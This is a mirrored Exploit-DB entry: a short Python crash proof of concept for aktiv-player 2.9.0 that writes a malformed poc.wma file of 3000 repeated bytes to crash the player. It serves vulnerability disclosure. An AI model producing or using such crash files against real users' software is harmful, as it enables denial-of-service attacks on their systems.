exploit-db-mirror/exploits/windows/dos/24812.py
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

15 lines
No EOL
382 B
Python
Executable file

# !/usr/bin/python
# Exploit Title: aktiv-player version 2.9.0 Crash PoC
# Exploit Author: metacom
# RST
# Vendor Homepage: http://www.goforsharing.com/home-mainmenu-1/aktiv-player-mainmenu-131.html
# Tested on: Windows 7 German
filename = "poc.wma"
buffer = "\x41" * 3000
exploit = buffer
textfile = open(filename , 'w')
textfile.write(exploit)
textfile.close()